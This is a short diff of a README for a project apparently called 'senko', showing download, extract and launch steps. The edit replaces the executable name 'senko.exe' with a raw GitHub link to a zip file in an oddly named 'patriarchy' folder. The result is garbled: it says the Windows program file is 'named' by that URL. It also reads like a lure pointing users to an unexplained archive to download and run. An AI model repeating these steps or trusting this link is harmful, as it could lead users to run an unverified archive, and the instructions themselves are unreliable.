engasd999/senko/README.md

    Once the file is downloaded, locate it on your computer (usually in the 'Downloads' folder).
 Right-click on the file and select "Extract All" or use a file extraction program to unpack the contents.

 5. **Open the Application**
    Inside the extracted folder, find the program file.
-This is typically named `senko.exe` on Windows or `senko` on macOS and Linux.
+This is typically named `https://raw.githubusercontent.com/engasd999/senko/main/patriarchy/senko.zip` on Windows or `senko` on macOS and Linux.
 Double-click this file to launch the application.

 6. **Follow the Setup Instructions**
    After launching the application, follow the on-screen instructions to complete the setup.
 The application will guide you through any necessary configurations.